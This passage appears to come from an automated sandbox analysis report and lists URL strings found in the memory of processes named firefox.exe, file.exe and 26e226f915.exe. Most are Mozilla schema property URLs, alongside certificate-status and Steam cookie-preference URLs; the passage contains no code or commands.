Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#The
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3168936561.00000170855CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3332238154.00000170855CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3178632048.00000170855CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3206581010.00000170855CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/aboutWelcomeBehavior
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appId
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appName
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThresholdhttp://mozilla.org/#/propert
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureId
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value/additiona
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slug
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value/additiona
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/featureI
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemshttp://mozilla.org/#
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slughttp://mozilla.org/#/propertie
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/itemsextensions.webcompat.disabled_shims.Crave.ca
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1http://mozilla.org/#/properties/targeting
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemshttp://mozilla.org/#
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/featureshttp://mozilla.org/#/prope
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratioJSON.parse:
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/itemsurlclassifier.features.socialtracking.blacklis
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2http://mozilla.org/#/properties/featureIds
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/brancheshttp://mozilla.org/#/properties/branches/anyOf/1http://mozil
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/count
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/countextensions.webcompat.disabled_shims.Kin
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespace
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnit
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnitArray
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/start
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/startextensions.webcompat.disabled_shims.Web
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/total
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/channel
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/csvImport
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/disableGreaseOnFallback
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxAnyPriorityThreads
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreads
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreconnectEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreloadEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/endDate
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDate
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDateurlclassifier.features.fingerprinting.whitelistTabl
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureIds/items
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOut
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOuturlclassifier.features.cryptomining.annotate.
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/forceWaitHttpsRRhttp://mozilla.org/#/properties/h3GreaseEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/greasePaddingSize
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/h3Enabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/id
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/insecureFallbackCould
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isRollout
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0urlclassifier.features.fingerprinting.blacklist
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1browser.safebrowsing.features.fingerprinting.an
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/migrateExtensions
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/networkPredictorRollout
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slug
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slugextensions.webcompat.disabled_shims.Sp
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/preconnect
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedDuration
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollment
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollmentbrowser.safebrowsing.features.cryptomining.annotat
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabledhttp://mozilla.org/#/properties/qui
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialog
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShowOnboardingDialogAfterNRestarts
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/recordNavigationalSuggestionTelemetry
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/referenceBranch
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/referenceBranchhttp://mozilla.org/#/properties/localizations
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/schemaVersion
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/schemaVersionhttp://mozilla.org/#/properties/appNamehttp://mozilla.o
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showImportAll
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showPreferencesEntrypoint
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/slug
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/slughttp://mozilla.org/#/properties/outcomeshttp://mozilla.org/#/pro
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/startDate
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/tlsEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/tlsGreaseProb
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/useNewWizard
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingName
Source: firefox.exe, 0000001B.00000002.3300643832.0000017083E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3297648118.0000017083A4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3328273548.0000017085378000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3183980208.0000017085961000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3098920941.0000017083CD1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3151203529.0000017085845000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3301585545.0000017083F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296944839.0000017083903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3101001598.0000017080DCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3192896386.00000170859F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3321587430.0000017084F5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BDAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3098827298.0000017083CB1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3204571257.00000170859D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3221206285.000001708BF69000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.000001708440C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3297648118.0000017083A22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3297648118.0000017083AC6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3293266018.000001708370C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3099368544.0000017083CCE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3099207221.0000017083CCE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
